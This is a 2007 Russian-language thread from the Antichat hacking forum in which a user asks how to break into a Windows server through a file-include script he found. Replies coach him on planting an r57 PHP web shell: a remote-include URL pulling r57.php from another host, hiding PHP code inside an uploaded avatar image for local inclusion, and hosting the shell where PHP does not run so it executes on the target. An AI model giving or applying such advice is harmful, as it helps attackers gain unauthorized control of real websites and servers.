Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Несколько моментов про инклюды (https://forum.antichat.xyz/showthread.php?t=33256)

Dark_G 12.02.2007 19:00

Несколько моментов про инклюды
 
Нашел на сервере скрипт, позволяющий просматривать любые файлы на сервере и инклудить php скрипты. Попытался инклудить r57 шелл с сайта на fatal.ru, но почему-то не получилось. На сервере стоит Windows 2003 server. Не подскажете что можно в данном случае сделать?

n0ne 12.02.2007 19:10

значит плохо пытался, пытайся лучше, р57 ничем не хуже других пхп, и вообще если у тя не получаеца залить, с чего ты взял что вообще можно пхп инк делать?

Constantine 12.02.2007 19:36

Ну если позволяет инклудить это очень хорошо. Кстати, не приходило в голову что инклуд может быть локальным, позтому конструкция http://site.ru/file=http://othersite.ru/r57.php не работает. Залей php шелл на тот сервис, можт там есть форум или можно подгружать файлы.

Termin@L 12.02.2007 21:16

Constantine дело говорит, просто иногда перед тем как инклудить скрипт или файл, сначала проверяют его существование, поэтому инклудить можно только локально... если есть на сайте форум и можно грузить аватары с компа, то берёшь картинку открываешь в блокноте и в конец добавляешь пхп код, грузишь и инклудишь - вуаля. правда не везде покатит, но как вариант

Lesnoy_chelovek 13.02.2007 05:05

Так, а мне вот интересно, мой шелл нафига трогать и палить, а?

Dark_G 14.02.2007 22:14

Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?

Termin@L 14.02.2007 22:24

Ну это фиг знает, значит это не инклуд, либо ты что-то перепутал...

Spyder 15.02.2007 11:30

2 Dark_G
видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть

Dark_G 15.02.2007 21:22

Цитата:

Сообщение от Spyder
2 Dark_G
видимо это не инклуд, а просто редирект на другую страничку. Такая фигня на вэб каталогах есть

Если редирект, то только из фрейма. Но все равно с этого ведь можно что-то поиметь! Просмотр файлов, как никак.

m0nzt3r 18.02.2007 11:03

Цитата:

Меня больше другое волнует. Когда, я допустим, инклудю пхпшник, в котором, к примеру выполняется только phpinfo(), он мне выдает результат не от того сайта, который я пытаюсь взломать, а от того, на котором залит пхпшник. Почему же он все таки выполняется на втором сайте а не на аттакуемом?
не догадываешь почему? :D это потому что тот хост, где у тебя пхп скрипт, поддерживает пхп скрипты.А ты инклудишь его :D лол..надо хостинг, который не поддерживает пхп


Время: 05:15